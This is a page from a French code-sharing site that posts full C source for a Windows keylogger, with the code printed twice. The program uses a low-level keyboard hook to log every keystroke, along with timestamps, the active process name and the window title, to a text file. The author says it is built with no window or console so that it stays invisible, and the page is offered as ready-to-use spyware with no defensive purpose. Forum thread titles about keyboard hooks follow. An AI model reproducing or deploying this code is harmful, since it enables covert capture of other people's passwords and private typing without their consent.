Accueil > > > KEYLOGGER AVEC NOM DU PROCESSUS ET DE LA FENETRE QUI A LE FOCUS
 KEYLOGGER AVEC NOM DU PROCESSUS ET DE LA FENETRE QUI A LE FOCUS
 Information sur la source
 Description
j'ai repris le code du keylogger sans dll de kerneltony95. merci a lui d'ailleurs. le nom du processus ainsi que le nom de la fenetre qui a le focus pendant la saisie j'ai rajouter l'heure ou la saisie a ete effectuer et le tout inscrit dans un fichier txt. Dans le projet code::blocks donne dans le zip il n'y a pas de fenêtre ni console pour que le keylogger soit invisible(sinon je vois pas a quoi sert un keylogger)
 Source
- #include <windows.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <psapi.h>
- #include <time.h>
- #define CHEMINDULOG "log.txt"//constante ou est stoquer le chemin du fichier log
-
-
- // Global instance du hook
- HHOOK hKeyHook;
- HWND AncienHandle;
- FILE *log;
- tm DonneHeure();//recupere l'heure systeme, renvoie une structre de type tm
- bool Erreur=false;
-
- // Gestion du hook
- __declspec(dllexport) LRESULT CALLBACK KeyEvent (int nCode, WPARAM wParam, LPARAM lParam )
- {
- tm Heure;
-
- // Action du clavier et les touches tappées
- if ((nCode == HC_ACTION) && (wParam == WM_KEYDOWN))
- {
-
- // conversion du code -> ascii
- BYTE KeyState[256];
- WORD wBuf;
- char ch;
- char NomProcess[1024];
- char NomFenetre[1024];
-
- DWORD lpdwProcessId;
- HANDLE PID;
-
- // Structure pour récupération des informations
- KBDLLHOOKSTRUCT hooked = *((KBDLLHOOKSTRUCT*)lParam);
-
- /* Traitement récupération dec codes des touches */
-
- // Etat du clavier
- GetKeyboardState(KeyState);
-
- // Conversion code > ascii
- ToAscii(hooked.vkCode, hooked.scanCode ,KeyState,&wBuf,0);
-
- //on rajoute les touches non traitées par le hook
- switch (hooked.vkCode)
- {
-
- case 9 :
- {
-
- fprintf(log,"<TAB>");
-
-
- break;
- }
- case 13 :
- {
-
- fprintf(log,"\n");
- AncienHandle=0;
- break;
- }
- case VK_BACK :
- {
-
- fprintf(log,"<DEL>");
-
-
- break;
- }
- case VK_DELETE:
- {
-
- fprintf(log,"<Suppr>");
-
- break;
- }
-
- /* vous pouvez rajouter vos traitements perso ici ! */
-
- default : // on affiche les touches tappées
- {
- ch=((char)wBuf);
- HWND Handle=GetForegroundWindow();//on recupere le handle de la fenetre qui a le focus
-
- if (Handle!=AncienHandle)//si le handle est different du dernier alors on a changer de fenetre
- {
- fclose(log);//on ferme le log pour que les donnee soient reelement ecrite dedans
- log=fopen(CHEMINDULOG,"a+");//on le réouvre(je sais c'estun peu barbare)
- if (log!=NULL)
- {
- NomProcess[0]='\n';//on met en premiere caractere un retour chariot pour qu'il y est bien retour a la ligne avaant d'ecrire la nouvelle ligne
- NomFenetre[0]='\0';//pour s'assurer de ne pas ecrire autre chose.
- Heure=DonneHeure();//on recup l'heure
- fprintf(log,"\n%d:%d:%d: ",Heure.tm_hour,Heure.tm_min,Heure.tm_sec);//on l'ecrit
- GetWindowThreadProcessId(Handle,&lpdwProcessId);//on recupere l'id du thread d'apres son handle
- PID=OpenProcess(PROCESS_ALL_ACCESS,false,lpdwProcessId);//on recupere le PID du processus auquel apartient le thread ci-dessus
- if (PID!=NULL)
- {
- GetModuleBaseName(PID,NULL,NomProcess,sizeof NomProcess);//on recupere le nom du processus d'apres son PID
- }
- else
- {
- strcat(NomProcess,"<Inconnu>");//si cela a echoue on met inconnu
- }
-
-
-
- NomFenetre[0]='\0';
- GetWindowText(Handle,NomFenetre,sizeof NomFenetre);//ici on recupere le nom de la fenetre
- strcat(NomProcess,">");
- strcat(NomProcess,NomFenetre);
- strcat(NomProcess,": ");
- fprintf(log,"%s",NomProcess);//on ecrit le tout
-
- AncienHandle=Handle;//on met a jour le nouveau handle pour le comparer au prochaine
- }
- else
- {
- Erreur=true;
- return 0;
- }
-
- }
- fprintf(log,"%c",ch);//on ecrit le caractere qui a ete saisie au clavier
- break;
- }
-
- }
-
-
- }
- // Renvoi des messages au sytème
- return CallNextHookEx(hKeyHook, nCode,wParam,lParam);
- }
-
-
- // Boucle des messages
- void MsgLoop()
- {
- MSG message;
- while ((GetMessage(&message,NULL,0,0))&&(Erreur!=true))
- {
- TranslateMessage( &message );
- DispatchMessage( &message );
- }
- }
-
-
- DWORD WINAPI KeyLogger(LPVOID lpParameter)
- {
- // Récuperation de l'instance de notre executable
- HINSTANCE hExe = GetModuleHandle(NULL);
- if (!hExe) return 1;
-
- // on demarre le hook
- hKeyHook = SetWindowsHookEx (WH_KEYBOARD_LL,(HOOKPROC) KeyEvent,hExe, 0);
- tm Heure=DonneHeure();
-
- if (hKeyHook==NULL)
- {
- fprintf(log,"\n[le hook clavier a plante a ");
- fprintf(log,"%d:%d:%d]",Heure.tm_hour,Heure.tm_min,Heure.tm_sec);
- Erreur=true;
- }
- else
- {
- fprintf(log,"\n[La surveillance a demarre a ");
- fprintf(log,"%d:%d:%d]",Heure.tm_hour,Heure.tm_min,Heure.tm_sec);
- }
-
- // Boucle des messages
- MsgLoop();
-
- // on desactive le hook
- Heure=DonneHeure();
- if (UnhookWindowsHookEx(hKeyHook)==0)
- {
- fprintf(log,"\n[desactivation du Hook echoue a ");
- fprintf(log,"%d:%d:%d]",Heure.tm_hour,Heure.tm_min,Heure.tm_sec);
- }
- else
- {
- fprintf(log,"\n[Desactivation du hook a ");
- fprintf(log,"%d:%d:%d]",Heure.tm_hour,Heure.tm_min,Heure.tm_sec);
- }
-
- return 0;
- }
-
-
- int main(int argc, char *argv[])
- {
- // initialisation des options pour la fonction CreateThread
- HANDLE hThread;
- DWORD dwThread;
- log=fopen(CHEMINDULOG,"r");
- if (log==NULL)
- {
- log=fopen(CHEMINDULOG,"a+");
- fprintf(log,"\t\t\t[keylogger clavier]\n");
-
- if (log==NULL)
- {
- Erreur=true;
- return 1;
- }
- }
-
-
-
- // on crée le thread qui va démarrer le hook
- hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE) KeyLogger, (LPVOID)NULL, 0, &dwThread);
-
- if (hThread)
- {
- // Attente à l'infini
- return WaitForSingleObject(hThread,INFINITE);
- }
- else
- {
- return 0;
- }
- fclose(log);
-
- }
-
-
- tm DonneHeure()
- {
- time_t Timer;
- time(&Timer);
- struct tm *Heure;
- Heure = localtime(&Timer);
- return *Heure;
- }
-
-
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <psapi.h>
#include <time.h>
#define CHEMINDULOG "log.txt"//constante ou est stoquer le chemin du fichier log
// Global instance du hook
HHOOK hKeyHook;
HWND AncienHandle;
FILE *log;
tm DonneHeure();//recupere l'heure systeme, renvoie une structre de type tm
bool Erreur=false;
// Gestion du hook
__declspec(dllexport) LRESULT CALLBACK KeyEvent (int nCode, WPARAM wParam, LPARAM lParam )
{
tm Heure;
// Action du clavier et les touches tappées
if ((nCode == HC_ACTION) && (wParam == WM_KEYDOWN))
{
// conversion du code -> ascii
BYTE KeyState[256];
WORD wBuf;
char ch;
char NomProcess[1024];
char NomFenetre[1024];
DWORD lpdwProcessId;
HANDLE PID;
// Structure pour récupération des informations
KBDLLHOOKSTRUCT hooked = *((KBDLLHOOKSTRUCT*)lParam);
/* Traitement récupération dec codes des touches */
// Etat du clavier
GetKeyboardState(KeyState);
// Conversion code > ascii
ToAscii(hooked.vkCode, hooked.scanCode ,KeyState,&wBuf,0);
//on rajoute les touches non traitées par le hook
switch (hooked.vkCode)
{
case 9 :
{
fprintf(log,"<TAB>");
break;
}
case 13 :
{
fprintf(log,"\n");
AncienHandle=0;
break;
}
case VK_BACK :
{
fprintf(log,"<DEL>");
break;
}
case VK_DELETE:
{
fprintf(log,"<Suppr>");
break;
}
/* vous pouvez rajouter vos traitements perso ici ! */
default : // on affiche les touches tappées
{
ch=((char)wBuf);
HWND Handle=GetForegroundWindow();//on recupere le handle de la fenetre qui a le focus
if (Handle!=AncienHandle)//si le handle est different du dernier alors on a changer de fenetre
{
fclose(log);//on ferme le log pour que les donnee soient reelement ecrite dedans
log=fopen(CHEMINDULOG,"a+");//on le réouvre(je sais c'estun peu barbare)
if (log!=NULL)
{
NomProcess[0]='\n';//on met en premiere caractere un retour chariot pour qu'il y est bien retour a la ligne avaant d'ecrire la nouvelle ligne
NomFenetre[0]='\0';//pour s'assurer de ne pas ecrire autre chose.
Heure=DonneHeure();//on recup l'heure
fprintf(log,"\n%d:%d:%d: ",Heure.tm_hour,Heure.tm_min,Heure.tm_sec);//on l'ecrit
GetWindowThreadProcessId(Handle,&lpdwProcessId);//on recupere l'id du thread d'apres son handle
PID=OpenProcess(PROCESS_ALL_ACCESS,false,lpdwProcessId);//on recupere le PID du processus auquel apartient le thread ci-dessus
if (PID!=NULL)
{
GetModuleBaseName(PID,NULL,NomProcess,sizeof NomProcess);//on recupere le nom du processus d'apres son PID
}
else
{
strcat(NomProcess,"<Inconnu>");//si cela a echoue on met inconnu
}
NomFenetre[0]='\0';
GetWindowText(Handle,NomFenetre,sizeof NomFenetre);//ici on recupere le nom de la fenetre
strcat(NomProcess,">");
strcat(NomProcess,NomFenetre);
strcat(NomProcess,": ");
fprintf(log,"%s",NomProcess);//on ecrit le tout
AncienHandle=Handle;//on met a jour le nouveau handle pour le comparer au prochaine
}
else
{
Erreur=true;
return 0;
}
}
fprintf(log,"%c",ch);//on ecrit le caractere qui a ete saisie au clavier
break;
}
}
}
// Renvoi des messages au sytème
return CallNextHookEx(hKeyHook, nCode,wParam,lParam);
}
// Boucle des messages
void MsgLoop()
{
MSG message;
while ((GetMessage(&message,NULL,0,0))&&(Erreur!=true))
{
TranslateMessage( &message );
DispatchMessage( &message );
}
}
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
// Récuperation de l'instance de notre executable
HINSTANCE hExe = GetModuleHandle(NULL);
if (!hExe) return 1;
// on demarre le hook
hKeyHook = SetWindowsHookEx (WH_KEYBOARD_LL,(HOOKPROC) KeyEvent,hExe, 0);
tm Heure=DonneHeure();
if (hKeyHook==NULL)
{
fprintf(log,"\n[le hook clavier a plante a ");
fprintf(log,"%d:%d:%d]",Heure.tm_hour,Heure.tm_min,Heure.tm_sec);
Erreur=true;
}
else
{
fprintf(log,"\n[La surveillance a demarre a ");
fprintf(log,"%d:%d:%d]",Heure.tm_hour,Heure.tm_min,Heure.tm_sec);
}
// Boucle des messages
MsgLoop();
// on desactive le hook
Heure=DonneHeure();
if (UnhookWindowsHookEx(hKeyHook)==0)
{
fprintf(log,"\n[desactivation du Hook echoue a ");
fprintf(log,"%d:%d:%d]",Heure.tm_hour,Heure.tm_min,Heure.tm_sec);
}
else
{
fprintf(log,"\n[Desactivation du hook a ");
fprintf(log,"%d:%d:%d]",Heure.tm_hour,Heure.tm_min,Heure.tm_sec);
}
return 0;
}
int main(int argc, char *argv[])
{
// initialisation des options pour la fonction CreateThread
HANDLE hThread;
DWORD dwThread;
log=fopen(CHEMINDULOG,"r");
if (log==NULL)
{
log=fopen(CHEMINDULOG,"a+");
fprintf(log,"\t\t\t[keylogger clavier]\n");
if (log==NULL)
{
Erreur=true;
return 1;
}
}
// on crée le thread qui va démarrer le hook
hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE) KeyLogger, (LPVOID)NULL, 0, &dwThread);
if (hThread)
{
// Attente à l'infini
return WaitForSingleObject(hThread,INFINITE);
}
else
{
return 0;
}
fclose(log);
}
tm DonneHeure()
{
time_t Timer;
time(&Timer);
struct tm *Heure;
Heure = localtime(&Timer);
return *Heure;
}
 Conclusion
j'ai juste rajouter se qui me semble important dans un keylogger a savoir le nom de la fenêtre et du processus qui a reçu la saisie au clavier car par exemple le toys n'a pas la même signification sur un site pour enfant que sur un site pour adulte lol.
Pour se qui est du fait de fermer et de réouvrir juste après c'est le seul moyen que j'ai trouver pour que les info soit réellement écrit dans le log sans attendre la fin du programme (avec le fclose(log));
Sur ceux je suis ouvert a toute remarque constructive.
 Sources du même auteur
 Sources de la même categorie
 Commentaires et avis
 Discussions en rapport avec ce code source dans le forum
keylogger [ par error ]
donc voila je voudrait savoir s'y il y a moyen de faire un keylloger/prog qui eregistre les tuche taper au clavier en c++merci ++
Keylogger [ par glipper ]
Bonjour,J'aimerais juste faire un petit keylogger (rassurez vous ce n'est pas mechant, c'est juste pour moi), mais j'ai quelques problemes. Voici la p
hook sur la touche entrée [ par Anacr0x ]
voila mon problème, jme suis aidé avec la source de BruNews pour faire ce code mais ca ne marche pas !// le HOOK LOCAL est ICILRESULT CALLBACK GetMsgP
hook global [ par Xentor609 ]
Salut,Je sais bien que ca enerve certain les questions sur les hooks, mais al trouve vraiment pas.Je souhaiterais placer un hook sur le clavier, pour
kesk1 hook? [ par melkiorlenecrarque ]
alu!ben C tout simple!kesk1 hook et a koi sa sert?merci
Hook sur fenêtre "Enregistrer sous" [ par annplop ]
Bonjour,je souhaite intercepter une fenêtre "enregistrer sous", et remplir les différents champs:"Enregistrer dans""Nom de l'objet""type"Est-ce quelqu
Hook [ par Anacr0x ]
Salut tt le monde,j'ai juste une petite question :lorsqu'on crée un hook, on intercepte les message, mais ya-t-il un moyen de les bloqué totalement ?J
Hook sur WSAsend ? [ par 83ron ]
Lut tous le monde touts d'abord ^^.Voila, j'aimerais fair un prog qui intercepete les message d'une application transmis via les Sockets. Donc je voul
HOOK - Help [DevCPP] [ par guitoulefoux ]
Bonjour,J'essaye de faire un hook (mon 1er) mais a chaque fois qu'il se lance j'ai un pb d'affectation mémoire.en fait le HOOK récupère les actions cl
Hook intercepté ?? [ par mlarrere ]
Je souhaite utiliser un hook keyboard pour intercepter des touches et les renvoyers différemment.C'est un hook global (DLL) car c'est pour une appli e
|
Derniers Blogs
 IMAGINE CUP 2012, MAKE A SIGN EN FINALEIMAGINE CUP 2012, MAKE A SIGN EN FINALE par junarnoalg
Voilà qui est fait, la nouvelle est officielle ! L'équipe belge "Make a Sign" va au pays des kangourous défendre son projet dans la catégorie Software Design. http://www.imaginecup.com/CompetitionsContent/Competition/WorldwideFinalists.aspx V...
Cliquez pour lire la suite de l'article par junarnoalg KINECT 1.5 IS OUT !KINECT 1.5 IS OUT ! par Vko
La version 1.5 du Kinect For Microsoft vient tout juste de sortir ! Plein de nouveautés: Tracking de squelette en Near Mode Détection en position assise Détection faciale avec un SDK dédié Documentation et des guideline (enfin) Un out...
Cliquez pour lire la suite de l'article par Vko LES ACTUALITéS DE LA SEMAINE SUR C2I.FR (14 MAI - 20 MAI) LES ACTUALITéS DE LA SEMAINE SUR C2I.FR (14 MAI - 20 MAI) par richardc
Mise à jour des Web API du 14 Mai
Réservez dès maintenant votre journée du 20 juin pour le Windows Azure Dev Camp 2012 à Paris
Mise à jour de Team Foundation Service
MechCommander 2 sur Windows 8
Entity Framework 5 Release Candidate e...
Cliquez pour lire la suite de l'article par richardc REACTIVE EXTENSIONS : CONSOMMER DES SERVICES AVEC RX PARTIE 3, LES PIèGES à éVITERREACTIVE EXTENSIONS : CONSOMMER DES SERVICES AVEC RX PARTIE 3, LES PIèGES à éVITER par Groc
Une mauvaise utilisation de rx lors de l'écriture d'une couche d'accès à des services peut conduire à des cas embarassants avec des erreurs mal gérées, des appels qui ne partent lorsqu'ils le devraient, et même des résultats incorrects . le tout nuis...
Cliquez pour lire la suite de l'article par Groc SHAREPOINT BLOG SITE, PROBLèME D'ARCHIVESSHAREPOINT BLOG SITE, PROBLèME D'ARCHIVES par junarnoalg
Dernièrement, nous avons migré le site
myTIC
vers un nouveau serveur SharePoint 2010. Dans les contenus que nous vouloins récupérer, nous avions un certain nombre de blogs.
Nous avons utilisé les commandes Power...
Cliquez pour lire la suite de l'article par junarnoalg
Forum
 RE : SAC A DOS RE : SAC A DOS par hadjkaddour
Cliquez pour lire la suite par hadjkaddour
Logiciels
 sDEVIS-FACTURES vlPRO (8.1.0.3)SDEVIS-FACTURES VLPRO (8.1.0.3)sDEVIS-FACTURES vlPRO a été mis au point pour les particuliers, créateurs, entrepreneurs, artisa... Cliquez pour télécharger sDEVIS-FACTURES vlPRO 974 Application Server (12.2.4.6)974 APPLICATION SERVER (12.2.4.6)Développez de puissantes applications dans un environnement de 'cloud computing', clusterisé, séc... Cliquez pour télécharger 974 Application Server vPicture (1.4.2.1)VPICTURE (1.4.2.1)Avec vPicture, hébergez vos images facilement et rapidement.
vPicture est un utilitaire simple, ... Cliquez pour télécharger vPicture Easy-Planning (2.2.1.6)EASY-PLANNING (2.2.1.6)Easy-Planning permet de créer des plannings sous la représentation de diagrammes et est adapté au... Cliquez pour télécharger Easy-Planning COM-BACKUP (2.0)COM-BACKUP (2.0)
COM-BACKUP est un logiciel de sauvegarde qui permet de planifier les sauvegardes de vos dossiers ...
Cliquez pour télécharger COM-BACKUP
|